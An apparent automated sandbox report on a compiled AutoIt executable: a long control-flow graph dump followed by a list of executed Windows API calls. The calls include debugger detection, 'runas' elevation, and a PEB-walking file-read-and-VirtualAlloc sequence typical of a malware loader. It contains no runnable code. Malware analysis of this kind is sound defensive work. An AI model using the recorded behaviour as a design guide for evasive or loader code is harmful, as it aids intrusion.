105879->105978 105979 907213 59 API calls Mailbox 105879->105979 105881 93e4c8 105880->105881 105881->105836 105883 9075af 105882->105883 105886 907522 _memmove 105882->105886 105885 920db6 Mailbox 59 API calls 105883->105885 105884 920db6 Mailbox 59 API calls 105887 907529 105884->105887 105885->105886 105886->105884 105888 920db6 Mailbox 59 API calls 105887->105888 105889 907552 105887->105889 105888->105889 105889->105772 105891 907370 105890->105891 105894 90741e 105890->105894 105892 920db6 Mailbox 59 API calls 105891->105892 105893 9073a2 105891->105893 105892->105893 105893->105894 105895 920db6 59 API calls Mailbox 105893->105895 105894->105772 105895->105893 105896->105756 105897->105772 105898->105772 105899->105772 105900->105766 105902 905c6f CloseHandle 105901->105902 105903 9057dc Mailbox 105902->105903 105904 905c6f CloseHandle 105903->105904 105905 9057eb 105904->105905 105905->105842 105906->105796 105907->105798 105908->105806 105909->105827 105910->105805 105912 907667 59 API calls 105911->105912 105913 9045b1 105912->105913 105914 907667 59 API calls 105913->105914 105915 9045b9 105914->105915 105916 907667 59 API calls 105915->105916 105917 9045c1 105916->105917 105918 907667 59 API calls 105917->105918 105919 9045c9 105918->105919 105920 93d4d2 105919->105920 105921 9045fd 105919->105921 105922 908047 59 API calls 105920->105922 105923 90784b 59 API calls 105921->105923 105924 93d4db 105922->105924 105925 90460b 105923->105925 105926 907d8c 59 API calls 105924->105926 105927 907d2c 59 API calls 105925->105927 105929 904640 105926->105929 105928 904615 105927->105928 105928->105929 105930 90784b 59 API calls 105928->105930 105932 90465f 105929->105932 105946 904680 105929->105946 105948 93d4fb 105929->105948 105933 904636 105930->105933 105936 9079f2 59 API calls 105932->105936 105935 907d2c 59 API calls 105933->105935 105934 93d5cb 105938 907bcc 59 API calls 105934->105938 105935->105929 105939 904669 105936->105939 105937 904691 105940 9046a3 105937->105940 105942 908047 59 API calls 105937->105942 105957 93d588 105938->105957 105945 90784b 59 API calls 105939->105945 105939->105946 105941 9046b3 105940->105941 105943 908047 59 API calls 105940->105943 105944 9046ba 105941->105944 105947 908047 59 API calls 105941->105947 105942->105940 105943->105941 105950 908047 59 API calls 105944->105950 105959 9046c1 Mailbox 105944->105959 105945->105946 105985 90784b 105946->105985 105947->105944 105948->105934 105949 93d5b4 105948->105949 105956 93d532 105948->105956 105949->105934 105952 93d59f 105949->105952 105950->105959 105951 9079f2 59 API calls 105951->105957 105955 907bcc 59 API calls 105952->105955 105953 93d590 105954 907bcc 59 API calls 105953->105954 105954->105957 105955->105957 105956->105953 105960 93d57b 105956->105960 105957->105946 105957->105951 105998 907924 59 API calls 2 library calls 105957->105998 105959->105825 105961 907bcc 59 API calls 105960->105961 105961->105957 105962->105874 105963->105874 105964->105874 105965->105874 105966->105874 105967->105874 105968->105874 105970 905c88 105969->105970 105971 905c79 105969->105971 105970->105971 105972 905c8d CloseHandle 105970->105972 105971->105850 105972->105971 105973->105795 105974->105802 105975->105881 105976->105879 105977->105879 105978->105879 105979->105879 105980->105854 105981->105857 105982->105878 105983->105858 105984->105863 105986 9078b7 105985->105986 105987 90785a 105985->105987 105989 907d2c 59 API calls 105986->105989 105987->105986 105988 907865 105987->105988 105991 907880 105988->105991 105992 93eb09 105988->105992 105990 907888 _memmove 105989->105990 105990->105937 105999 907f27 59 API calls Mailbox 105991->105999 105993 908029 59 API calls 105992->105993 105995 93eb13 105993->105995 105996 920db6 Mailbox 59 API calls 105995->105996 105997 93eb33 105996->105997 105998->105957 105999->105990 106001 906d95 106000->106001 106006 906ea9 106000->106006 106002 920db6 Mailbox 59 API calls 106001->106002 106001->106006 106004 906dbc 106002->106004 106003 920db6 Mailbox 59 API calls 106010 906e31 106003->106010 106004->106003 106006->104890 106008 90735d 59 API calls 106008->106010 106009 90750f 59 API calls 106009->106010 106010->106006 106010->106008 106010->106009 106013 906240 106010->106013 106038 956553 59 API calls Mailbox 106010->106038 106011->104892 106012->104894 106014 907a16 59 API calls 106013->106014 106032 906265 106014->106032 106015 90646a 106016 90750f 59 API calls 106015->106016 106017 906484 Mailbox 106016->106017 106017->106010 106020 93dff6 106043 95f8aa 91 API calls 4 library calls 106020->106043 106021 90750f 59 API calls 106021->106032 106025 93e004 106027 90750f 59 API calls 106025->106027 106026 907d8c 59 API calls 106026->106032 106028 93e01a 106027->106028 106028->106017 106029 906799 _memmove 106044 95f8aa 91 API calls 4 library calls 106029->106044 106030 93df92 106031 908029 59 API calls 106030->106031 106033 93df9d 106031->106033 106032->106015 106032->106020 106032->106021 106032->106026 106032->106029 106032->106030 106035 907e4f 59 API calls 106032->106035 106039 905f6c 60 API calls 106032->106039 106040 905d41 59 API calls Mailbox 106032->106040 106041 905e72 60 API calls 106032->106041 106042 907924 59 API calls 2 library calls 106032->106042 106037 920db6 Mailbox 59 API calls 106033->106037 106036 90643b CharUpperBuffW 106035->106036 106036->106032 106037->106029 106038->106010 106039->106032 106040->106032 106041->106032 106042->106032 106043->106025 106044->106017 106045->104909 106046->104908 106048 90e6d5 106047->106048 106049 943aa9 106048->106049 106052 90e73f 106048->106052 106060 90e799 106048->106060 106221 909ea0 106049->106221 106051 943abe 106077 90e970 Mailbox 106051->106077 106245 969e4a 89 API calls 4 library calls 106051->106245 106055 907667 59 API calls 106052->106055 106052->106060 106053 907667 59 API calls 106053->106060 106056 943b04 106055->106056 106059 922d40 __cinit 67 API calls 106056->106059 106057 922d40 __cinit 67 API calls 106057->106060 106058 943b26 106058->104987 106059->106060 106060->106053 106060->106057 106060->106058 106062 90e95a 106060->106062 106060->106077 106061 9084c0 69 API calls 106061->106077 106062->106077 106246 969e4a 89 API calls 4 library calls 106062->106246 106064 969e4a 89 API calls 106064->106077 106065 908d40 59 API calls 106065->106077 106068 909ea0 331 API calls 106068->106077 106074 90f195 106250 969e4a 89 API calls 4 library calls 106074->106250 106075 943e25 106075->104987 106076 90ea78 106076->104987 106077->106061 106077->106064 106077->106065 106077->106068 106077->106074 106077->106076 106220 907f77 59 API calls 2 library calls 106077->106220 106247 956e8f 59 API calls 106077->106247 106248 97c5c3 331 API calls 106077->106248 106249 97b53c 331 API calls Mailbox 106077->106249 106251 909c90 59 API calls Mailbox 106077->106251 106252 9793c6 331 API calls Mailbox 106077->106252 106079 90f650 106078->106079 106080 90f4ba 106078->106080 106083 907de1 59 API calls 106079->106083 106081 90f4c6 106080->106081 106082 94441e 106080->106082 106371 90f290 331 API calls 2 library calls 106081->106371 106373 97bc6b 106082->106373 106089 90f58c Mailbox 106083->106089 106086 94442c 106090 90f630 106086->106090 106413 969e4a 89 API calls 4 library calls 106086->106413 106088 90f4fd 106088->106086 106088->106089 106088->106090 106094 904e4a 84 API calls 106089->106094 106279 97445a 106089->106279 106288 96cb7a 106089->106288 106368 963c37 106089->106368 106090->104987 106092 90f5e3 106092->106090 106372 909c90 59 API calls Mailbox 106092->106372 106094->106092 106098 903212 106097->106098 106100 9031e0 106097->106100 106098->104987 106099 903205 IsDialogMessageW 106099->106098 106099->106100 106100->106098 106100->106099 106101 93cf32 GetClassLongW 106100->106101 106101->106099 106101->106100 106102->104987 106579 908180 106103->106579 106105 90fd3d 106106 94472d 106105->106106 106167 9106f6 106105->106167 106584 90f234 106105->106584 106601 969e4a 89 API calls 4 library calls 106106->106601 106110 94488d 106114 90fe4c 106110->106114 106162 944742 106110->106162 106112 90fe3e 106112->106110 106112->106114 106605 9566ec 59 API calls 2 library calls 106112->106605 106113 910517 106121 920db6 Mailbox 59 API calls 106113->106121 106118 920db6 59 API calls Mailbox 106144 90fdd3 106118->106144 106128 910545 _memmove 106121->106128 106127 944755 106144->106112 106144->106113 106144->106118 106144->106127 106144->106128 106149 909ea0 331 API calls 106144->106149 106155 94480c 106144->106155 106144->106162 106149->106144 106600 969e4a 89 API calls 4 library calls 106167->106600 106183->104917 106184->104922 106185->104987 106186->104925 106187->104925 106188->104925 106189->104987 106190->104987 106191->104987 106193 909851 106192->106193 106204 90984b 106192->106204 106194 93f5d3 __i64tow 106193->106194 106195 909899 106193->106195 106197 909857 __itow 106193->106197 106200 93f4da 106193->106200 106621 923698 83 API calls 4 library calls 106195->106621 106199 920db6 Mailbox 59 API calls 106197->106199 106201 909871 106199->106201 106202 920db6 Mailbox 59 API calls 106200->106202 106208 93f552 Mailbox _wcscpy 106200->106208 106203 907de1 59 API calls 106201->106203 106201->106204 106205 93f51f 106202->106205 106203->106204 106204->104987 106206 920db6 Mailbox 59 API calls 106205->106206 106207 93f545 106206->106207 106207->106208 106209 907de1 59 API calls 106207->106209 106622 923698 83 API calls 4 library calls 106208->106622 106209->106208 106210->104987 106211->104987 106212->104987 106213->104972 106214->104972 106215->104972 106216->104972 106217->104972 106218->104972 106219->104972 106220->106077 106222 909ebf 106221->106222 106238 909eed Mailbox 106221->106238 106223 920db6 Mailbox 59 API calls 106222->106223 106223->106238 106224 922d40 67 API calls __cinit 106224->106238 106225 90b475 106226 908047 59 API calls 106225->106226 106239 90a057 106226->106239 106227 90b47a 106229 940055 106227->106229 106244 9409e5 106227->106244 106228 920db6 59 API calls Mailbox 106228->106238 106270 969e4a 89 API calls 4 library calls 106229->106270 106233 940064 106233->106051 106235 907667 59 API calls 106235->106238 106237 908047 59 API calls 106237->106238 106238->106224 106238->106225 106238->106227 106238->106228 106238->106229 106238->106235 106238->106237 106238->106239 106240 956e8f 59 API calls 106238->106240 106241 9409d6 106238->106241 106243 90a55a 106238->106243 106253 90b900 106238->106253 106269 90c8c0 331 API calls 2 library calls 106238->106269 106239->106051 106240->106238 106272 969e4a 89 API calls 4 library calls 106241->106272 106271 969e4a 89 API calls 4 library calls 106243->106271 106273 969e4a 89 API calls 4 library calls 106244->106273 106245->106077 106246->106077 106247->106077 106248->106077 106249->106077 106250->106075 106251->106077 106252->106077 106254 90bac7 106253->106254 106255 90b91a 106253->106255 106256 90bf81 106254->106256 106259 90baab 106254->106259 106261 90bb46 106254->106261 106266 90ba8b Mailbox 106254->106266 106255->106254 106255->106256 106258 90b9fc 106255->106258 106255->106259 106256->106259 106278 9094dc 59 API calls wcstoxq 106256->106278 106258->106259 106258->106261 106264 90ba38 106258->106264 106259->106238 106261->106259 106262 941361 106261->106262 106261->106266 106275 956e8f 59 API calls 106261->106275 106262->106259 106264->106259 106264->106266 106266->106238 106266->106259 106266->106262 106277 908cd4 59 API calls Mailbox 106266->106277 106269->106238 106270->106233 106271->106239 106272->106244 106273->106239 106275->106266 106277->106266 106278->106259 106280 909837 84 API calls 106279->106280 106281 974494 106280->106281 106282 906240 94 API calls 106281->106282 106283 9744a4 106282->106283 106289 907667 59 API calls 106288->106289 106290 96cbaf 106289->106290 106291 907667 59 API calls 106290->106291 106292 96cbb8 106291->106292 106567 96445a GetFileAttributesW 106368->106567 106371->106088 106372->106092 106374 97bc96 106373->106374 106375 97bcb0 106373->106375 106571 969e4a 89 API calls 4 library calls 106374->106571 106572 97a213 59 API calls Mailbox 106375->106572 106378 97bcbb 106379 909ea0 330 API calls 106378->106379 106380 97bd1c 106379->106380 106381 97bca8 Mailbox 106380->106381 106381->106086 106413->106090 106568 963c3e 106567->106568 106569 964475 FindFirstFileW 106567->106569 106568->106092 106569->106568 106570 96448a FindClose 106569->106570 106570->106568 106571->106381 106572->106378 106580 90818f 106579->106580 106583 9081aa 106579->106583 106581 907e4f 59 API calls 106580->106581 106582 908197 CharUpperBuffW 106581->106582 106582->106583 106583->106105 106586 90f251 106584->106586 106585 90f272 106585->106144 106586->106585 106619 969e4a 89 API calls 4 library calls 106586->106619 106600->106106 106601->106162 106619->106585 106621->106197 106622->106194 106623 901055 106628 902649 106623->106628 106626 922d40 __cinit 67 API calls 106627 901064 106626->106627 106629 907667 59 API calls 106628->106629 106630 9026b7 106629->106630 106635 903582 106630->106635 106633 902754 106634 90105a 106633->106634 106638 903416 59 API calls 2 library calls 106633->106638 106634->106626 106639 9035b0 106635->106639 106638->106633 106640 9035bd 106639->106640 106641 9035a1 106639->106641 106640->106641 106642 9035c4 RegOpenKeyExW 106640->106642 106641->106633 106642->106641 106643 9035de RegQueryValueExW 106642->106643 106644 903614 RegCloseKey 106643->106644 106645 9035ff 106643->106645 106644->106641 106645->106644 106646 901016 106651 904974 106646->106651 106649 922d40 __cinit 67 API calls 106650 901025 106649->106650 106652 920db6 Mailbox 59 API calls 106651->106652 106653 90497c 106652->106653 106654 90101b 106653->106654 106658 904936 106653->106658 106654->106649 106659 90493f 106658->106659 106661 904951 106658->106661 106660 922d40 __cinit 67 API calls 106659->106660 106660->106661 106662 9049a0 106661->106662 106663 907667 59 API calls 106662->106663 106664 9049b8 GetVersionExW 106663->106664 106665 907bcc 59 API calls 106664->106665 106666 9049fb 106665->106666 106667 907d2c 59 API calls 106666->106667 106670 904a28 106666->106670 106668 904a1c 106667->106668 106669 907726 59 API calls 106668->106669 106669->106670 106671 904a93 GetCurrentProcess IsWow64Process 106670->106671 106673 93d864 106670->106673 106672 904aac 106671->106672 106674 904ac2 106672->106674 106675 904b2b GetSystemInfo 106672->106675 106686 904b37 106674->106686 106676 904af8 106675->106676 106676->106654 106679 904ad4 106681 904b37 2 API calls 106679->106681 106680 904b1f GetSystemInfo 106682 904ae9 106680->106682 106683 904adc GetNativeSystemInfo 106681->106683 106682->106676 106684 904aef FreeLibrary 106682->106684 106683->106682 106684->106676 106687 904ad0 106686->106687 106688 904b40 LoadLibraryA 106686->106688 106687->106679 106687->106680 106688->106687 106689 904b51 GetProcAddress 106688->106689 106689->106687 106690 12725e0 106704 1270230 106690->106704 106692 12726c1 106707 12724d0 106692->106707 106710 12736f0 GetPEB 106704->106710 106706 12708bb 106706->106692 106708 12724d9 Sleep 106707->106708 106709 12724e7 106708->106709 106711 127371a 106710->106711 106711->106706 106712 90be19 106713 90be22 106712->106713 106723 90baab 106712->106723 106714 909837 84 API calls 106713->106714 106722 90ba8b Mailbox 106713->106722 106713->106723 106715 90be4d 106714->106715 106716 90be5d 106715->106716 106717 94107b 106715->106717 106718 907a51 59 API calls 106716->106718 106727 957bdb 59 API calls _memmove 106717->106727 106718->106722 106720 941085 106721 908047 59 API calls 106720->106721 106721->106722 106722->106723 106725 941361 106722->106725 106729 908cd4 59 API calls Mailbox 106722->106729 106725->106723 106728 923d46 59 API calls __wtof_l 106725->106728 106727->106720 106728->106723 106729->106722 106730 1272b8b 106731 1272b92 106730->106731 106732 1272c30 106731->106732 106733 1272b9a 106731->106733 106750 12734e0 9 API calls 106732->106750 106737 1272840 106733->106737 106736 1272c17 106738 1270230 GetPEB 106737->106738 106747 12728df 106738->106747 106740 1272910 CreateFileW 106743 127291d 106740->106743 106740->106747 106741 1272939 VirtualAlloc 106742 127295a ReadFile 106741->106742 106741->106743 106742->106743 106746 1272978 VirtualAlloc 106742->106746 106744 1272b2c VirtualFree 106743->106744 106745 1272b3a 106743->106745 106744->106745 106745->106736 106746->106743 106746->106747 106747->106741 106747->106743 106748 1272a40 CloseHandle 106747->106748 106749 1272a50 VirtualFree 106747->106749 106751 1273750 GetPEB 106747->106751 106748->106747 106749->106747 106750->106736 106752 127377a 106751->106752 106752->106740 106753 90107d 106758 90708b 106753->106758 106755 90108c 106756 922d40 __cinit 67 API calls 106755->106756 106757 901096 106756->106757 106759 90709b __write_nolock 106758->106759 106760 907667 59 API calls 106759->106760 106761 907151 106760->106761 106762 904706 61 API calls 106761->106762 106763 90715a 106762->106763 106789 92050b 106763->106789 106766 907cab 59 API calls 106767 907173 106766->106767 106768 903f74 59 API calls 106767->106768 106769 907182 106768->106769 106770 907667 59 API calls 106769->106770 106771 90718b 106770->106771 106772 907d8c 59 API calls 106771->106772 106773 907194 RegOpenKeyExW 106772->106773 106774 93e8b1 RegQueryValueExW 106773->106774 106777 9071b6 Mailbox 106773->106777 106775 93e943 RegCloseKey 106774->106775 106776 93e8ce 106774->106776 106775->106777 106788 93e955 _wcscat Mailbox __wsetenvp 106775->106788 106778 920db6 Mailbox 59 API calls 106776->106778 106777->106755 106779 93e8e7 106778->106779 106781 90522e 59 API calls 106779->106781 106780 9079f2 59 API calls 106780->106788 106782 93e8f2 RegQueryValueExW 106781->106782 106783 93e90f 106782->106783 106785 93e929 106782->106785 106784 907bcc 59 API calls 106783->106784 106784->106785 106785->106775 106786 907de1 59 API calls 106786->106788 106787 903f74 59 API calls 106787->106788 106788->106777 106788->106780 106788->106786 106788->106787 106790 931940 __write_nolock 106789->106790 106791 920518 GetFullPathNameW 106790->106791 106792 92053a 106791->106792 106793 907bcc 59 API calls 106792->106793 106794 907165 106793->106794 106794->106766 106795 93fdfc 106799 90ab30 Mailbox _memmove 106795->106799 106797 95617e Mailbox 59 API calls 106810 90a057 106797->106810 106800 920db6 59 API calls Mailbox 106799->106800 106801 90b525 106799->106801 106799->106810 106821 909f37 Mailbox 106799->106821 106823 907de1 59 API calls 106799->106823 106827 97bc6b 331 API calls 106799->106827 106829 90b2b6 106799->106829 106831 909ea0 331 API calls 106799->106831 106832 94086a 106799->106832 106834 940878 106799->106834 106836 94085c 106799->106836 106837 90b21c 106799->106837 106841 956e8f 59 API calls 106799->106841 106844 97df23 106799->106844 106847 97df37 106799->106847 106850 97c2e0 106799->106850 106882 967956 106799->106882 106888 95617e 106799->106888 106892 909c90 59 API calls Mailbox 106799->106892 106896 97c193 85 API calls 2 library calls 106799->106896 106800->106799 106898 969e4a 89 API calls 4 library calls 106801->106898 106804 9409e5 106903 969e4a 89 API calls 4 library calls 106804->106903 106805 940055 106897 969e4a 89 API calls 4 library calls 106805->106897 106806 90b900 60 API calls 106806->106821 106807 90b475 106816 908047 59 API calls 106807->106816 106811 940064 106812 920db6 59 API calls Mailbox 106812->106821 106814 90b47a 106814->106804 106814->106805 106816->106810 106818 908047 59 API calls 106818->106821 106819 956e8f 59 API calls 106819->106821 106820 907667 59 API calls 106820->106821 106821->106805 106821->106806 106821->106807 106821->106810 106821->106812 106821->106814 106821->106818 106821->106819 106821->106820 106822 922d40 67 API calls __cinit 106821->106822 106824 9409d6 106821->106824 106826 90a55a 106821->106826 106891 90c8c0 331 API calls 2 library calls 106821->106891 106822->106821 106823->106799 106902 969e4a 89 API calls 4 library calls 106824->106902 106901 969e4a 89 API calls 4 library calls 106826->106901 106827->106799 106895 90f6a3 331 API calls 106829->106895 106831->106799 106899 909c90 59 API calls Mailbox 106832->106899 106900 969e4a 89 API calls 4 library calls 106834->106900 106836->106797 106836->106810 106893 909d3c 60 API calls Mailbox 106837->106893 106839 90b22d 106894 909d3c 60 API calls Mailbox 106839->106894 106841->106799 106904 97cadd 106844->106904 106846 97df33 106846->106799 106848 97cadd 130 API calls 106847->106848 106849 97df47 106848->106849 106849->106799 106851 907667 59 API calls 106850->106851 106852 97c2f4 106851->106852 106853 907667 59 API calls 106852->106853 106854 97c2fc 106853->106854 106855 907667 59 API calls 106854->106855 106856 97c304 106855->106856 106857 909837 84 API calls 106856->106857 106880 97c312 106857->106880 106858 907bcc 59 API calls 106858->106880 106859 97c4fb 106866 97c528 Mailbox 106859->106866 106996 909a3c 59 API calls Mailbox 106859->106996 106861 97c4e2 106865 907cab 59 API calls 106861->106865 106862 907924 59 API calls 106862->106880 106863 97c4fd 106867 907cab 59 API calls 106863->106867 106864 908047 59 API calls 106864->106880 106868 97c4ef 106865->106868 106866->106799 106869 97c50c 106867->106869 106871 907b2e 59 API calls 106868->106871 106872 907b2e 59 API calls 106869->106872 106870 907e4f 59 API calls 106874 97c3a9 CharUpperBuffW 106870->106874 106871->106859 106872->106859 106873 907e4f 59 API calls 106875 97c469 CharUpperBuffW 106873->106875 106994 90843a 68 API calls 106874->106994 106995 90c5a7 69 API calls 2 library calls 106875->106995 106878 909837 84 API calls 106878->106880 106879 907b2e 59 API calls 106879->106880 106880->106858 106880->106859 106880->106861 106880->106862 106880->106863 106880->106864 106880->106866 106880->106870 106880->106873 106880->106878 106880->106879 106881 907cab 59 API calls 106880->106881 106881->106880 106883 967962 106882->106883 106884 920db6 Mailbox 59 API calls 106883->106884 106885 967970 106884->106885 106886 96797e 106885->106886 106887 907667 59 API calls 106885->106887 106886->106799 106887->106886 106997 9560c0 106888->106997 106890 95618c 106890->106799 106891->106821 106892->106799 106893->106839 106894->106829 106895->106801 106896->106799 106897->106811 106898->106836 106899->106836 106900->106836 106901->106810 106902->106804 106903->106810 106905 909837 84 API calls 106904->106905 106906 97cb1a 106905->106906 106929 97cb61 Mailbox 106906->106929 106942 97d7a5 106906->106942 106908 97cdb9 106909 97cf2e 106908->106909 106913 97cdc7 106908->106913 106981 97d8c8 92 API calls Mailbox 106909->106981 106912 97cf3d 106912->106913 106915 97cf49 106912->106915 106955 97c96e 106913->106955 106914 909837 84 API calls 106930 97cbb2 Mailbox 106914->106930 106915->106929 106920 97ce00 106970 920c08 106920->106970 106923 97ce33 106926 9092ce 59 API calls 106923->106926 106924 97ce1a 106976 969e4a 89 API calls 4 library calls 106924->106976 106928 97ce3f 106926->106928 106927 97ce25 GetCurrentProcess TerminateProcess 106927->106923 106931 909050 59 API calls 106928->106931 106929->106846 106930->106908 106930->106914 106930->106929 106974 97fbce 59 API calls 2 library calls 106930->106974 106975 97cfdf 61 API calls 2 library calls 106930->106975 106932 97ce55 106931->106932 106941 97ce7c 106932->106941 106977 908d40 59 API calls Mailbox 106932->106977 106934 97ce6b 106978 97d649 107 API calls _free 106934->106978 106935 97cfa4 106935->106929 106938 97cfb8 FreeLibrary 106935->106938 106938->106929 106941->106935 106979 908d40 59 API calls Mailbox 106941->106979 106980 909d3c 60 API calls Mailbox 106941->106980 106982 97d649 107 API calls _free 106941->106982 106943 907e4f 59 API calls 106942->106943 106944 97d7c0 CharLowerBuffW 106943->106944 106983 95f167 106944->106983 106948 907667 59 API calls 106949 97d7f9 106948->106949 106950 90784b 59 API calls 106949->106950 106952 97d810 106950->106952 106951 97d858 Mailbox 106951->106930 106953 907d2c 59 API calls 106952->106953 106954 97d81c Mailbox 106953->106954 106954->106951 106990 97cfdf 61 API calls 2 library calls 106954->106990 106956 97c989 106955->106956 106957 97c9de 106955->106957 106958 920db6 Mailbox 59 API calls 106956->106958 106961 97da50 106957->106961 106960 97c9ab 106958->106960 106959 920db6 Mailbox 59 API calls 106959->106960 106960->106957 106960->106959 106962 97dc79 Mailbox 106961->106962 106966 97da73 _strcat _wcscpy __wsetenvp 106961->106966 106962->106920 106963 909b98 59 API calls 106963->106966 106964 909be6 59 API calls 106964->106966 106965 909b3c 59 API calls 106965->106966 106966->106962 106966->106963 106966->106964 106966->106965 106967 92571c 58 API calls __malloc_crt 106966->106967 106968 909837 84 API calls 106966->106968 106993 965887 61 API calls 2 library calls 106966->106993 106967->106966 106968->106966 106972 920c1d 106970->106972 106971 920cb5 VirtualProtect 106973 920c83 106971->106973 106972->106971 106972->106973 106973->106923 106973->106924 106974->106930 106975->106930 106976->106927 106977->106934 106978->106941 106979->106941 106980->106941 106981->106912 106982->106941 106984 95f192 __wsetenvp 106983->106984 106985 95f1d1 106984->106985 106988 95f1c7 106984->106988 106989 95f278 106984->106989 106985->106948 106985->106954 106988->106985 106991 9078c4 61 API calls 106988->106991 106989->106985 106992 9078c4 61 API calls 106989->106992 106990->106951 106991->106988 106992->106989 106993->106966 106994->106880 106995->106880 106996->106866 106998 9560e8 106997->106998 106999 9560cb 106997->106999 106998->106890 106999->106998 107001 9560ab 59 API calls Mailbox 106999->107001 107001->106999 107002 93fe27 107015 91f944 107002->107015 107004 93fe3d 107005 93fe53 107004->107005 107006 93febe 107004->107006 107024 909e5d 60 API calls 107005->107024 107011 90fce0 331 API calls 107006->107011 107008 93fe92 107009 94089c 107008->107009 107010 93fe9a 107008->107010 107026 969e4a 89 API calls 4 library calls 107009->107026 107025 96834f 59 API calls Mailbox 107010->107025 107013 93feb2 Mailbox 107011->107013 107016 91f950 107015->107016 107017 91f962 107015->107017 107027 909d3c 60 API calls Mailbox 107016->107027 107019 91f991 107017->107019 107020 91f968 107017->107020 107028 909d3c 60 API calls Mailbox 107019->107028 107021 920db6 Mailbox 59 API calls 107020->107021 107023 91f95a 107021->107023 107023->107004 107024->107008 107025->107013 107026->107013 107027->107023 107028->107023 107029 901066 107034 90f76f 107029->107034 107031 90106c 107032 922d40 __cinit 67 API calls 107031->107032 107033 901076 107032->107033 107035 90f790 107034->107035 107067 91ff03 107035->107067 107039 90f7d7 107040 907667 59 API calls 107039->107040 107041 90f7e1 107040->107041 107042 907667 59 API calls 107041->107042 107043 90f7eb 107042->107043 107044 907667 59 API calls 107043->107044 107045 90f7f5 107044->107045 107046 907667 59 API calls 107045->107046 107047 90f833 107046->107047 107048 907667 59 API calls 107047->107048 107049 90f8fe 107048->107049 107077 915f87 107049->107077 107053 90f930 107054 907667 59 API calls 107053->107054 107055 90f93a 107054->107055 107105 91fd9e 107055->107105 107057 90f981 107058 90f991 GetStdHandle 107057->107058 107059 90f9dd 107058->107059 107060 9445ab 107058->107060 107061 90f9e5 OleInitialize 107059->107061 107060->107059 107062 9445b4 107060->107062 107061->107031 107112 966b38 64 API calls Mailbox 107062->107112 107064 9445bb 107113 967207 CreateThread 107064->107113 107066 9445c7 CloseHandle 107066->107061 107114 91ffdc 107067->107114 107070 91ffdc 59 API calls 107071 91ff45 107070->107071 107072 907667 59 API calls 107071->107072 107073 91ff51 107072->107073 107074 907bcc 59 API calls 107073->107074 107075 90f796 107074->107075 107076 920162 6 API calls 107075->107076 107076->107039 107078 907667 59 API calls 107077->107078 107079 915f97 107078->107079 107080 907667 59 API calls 107079->107080 107081 915f9f 107080->107081 107121 915a9d 107081->107121 107084 915a9d 59 API calls 107085 915faf 107084->107085 107086 907667 59 API calls 107085->107086 107087 915fba 107086->107087 107088 920db6 Mailbox 59 API calls 107087->107088 107089 90f908 107088->107089 107090 9160f9 107089->107090 107091 916107 107090->107091 107092 907667 59 API calls 107091->107092 107093 916112 107092->107093 107094 907667 59 API calls 107093->107094 107095 91611d 107094->107095 107096 907667 59 API calls 107095->107096 107097 916128 107096->107097 107098 907667 59 API calls 107097->107098 107099 916133 107098->107099 107100 915a9d 59 API calls 107099->107100 107101 91613e 107100->107101 107102 920db6 Mailbox 59 API calls 107101->107102 107103 916145 RegisterWindowMessageW 107102->107103 107103->107053 107106 95576f 107105->107106 107107 91fdae 107105->107107 107124 969ae7 60 API calls 107106->107124 107109 920db6 Mailbox 59 API calls 107107->107109 107111 91fdb6 107109->107111 107110 95577a 107111->107057 107112->107064 107113->107066 107125 9671ed 65 API calls 107113->107125 107115 907667 59 API calls 107114->107115 107116 91ffe7 107115->107116 107117 907667 59 API calls 107116->107117 107118 91ffef 107117->107118 107119 907667 59 API calls 107118->107119 107120 91ff3b 107119->107120 107120->107070 107122 907667 59 API calls 107121->107122 107123 915aa5 107122->107123 107123->107084 107124->107110 107126 968d0d 107127 968d20 107126->107127 107128 968d1a 107126->107128 107129 968d31 107127->107129 107131 922d55 _free 58 API calls 107127->107131 107130 922d55 _free 58 API calls 107128->107130 107132 968d43 107129->107132 107133 922d55 _free 58 API calls 107129->107133 107130->107127 107131->107129 107133->107132 107134 94416f 107138 955fe6 107134->107138 107136 94417a 107137 955fe6 85 API calls 107136->107137 107137->107136 107140 955ff3 107138->107140 107145 956020 107138->107145 107139 956022 107150 909328 84 API calls Mailbox 107139->107150 107140->107139 107141 956027 107140->107141 107140->107145 107147 95601a 107140->107147 107143 909837 84 API calls 107141->107143 107144 95602e 107143->107144 107146 907b2e 59 API calls 107144->107146 107145->107136 107146->107145 107149 9095a0 59 API calls _wcsstr 107147->107149 107149->107145 107150->107141

                                          Executed Functions

                                          Function 00903B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00903B68
                                          • IsDebuggerPresent.KERNEL32 ref: 00903B7A
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,009C52F8,009C52E0,?,?), ref: 00903BEB
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                            • Part of subcall function 0091092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00903C14,009C52F8,?,?,?), ref: 0091096E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00903C6F
                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009B7770,00000010), ref: 0093D281
                                          • SetCurrentDirectoryW.KERNEL32(?,009C52F8,?,?,?), ref: 0093D2B9
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009B4260,009C52F8,?,?,?), ref: 0093D33F
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0093D346
                                            • Part of subcall function 00903A46: GetSysColorBrush.USER32(0000000F), ref: 00903A50
                                            • Part of subcall function 00903A46: LoadCursorW.USER32(00000000,00007F00), ref: 00903A5F
                                            • Part of subcall function 00903A46: LoadIconW.USER32(00000063), ref: 00903A76
                                            • Part of subcall function 00903A46: LoadIconW.USER32(000000A4), ref: 00903A88
                                            • Part of subcall function 00903A46: LoadIconW.USER32(000000A2), ref: 00903A9A
                                            • Part of subcall function 00903A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00903AC0
                                            • Part of subcall function 00903A46: RegisterClassExW.USER32(?), ref: 00903B16
                                            • Part of subcall function 009039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00903A03
                                            • Part of subcall function 009039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00903A24
                                            • Part of subcall function 009039D5: ShowWindow.USER32(00000000,?,?), ref: 00903A38
                                            • Part of subcall function 009039D5: ShowWindow.USER32(00000000,?,?), ref: 00903A41
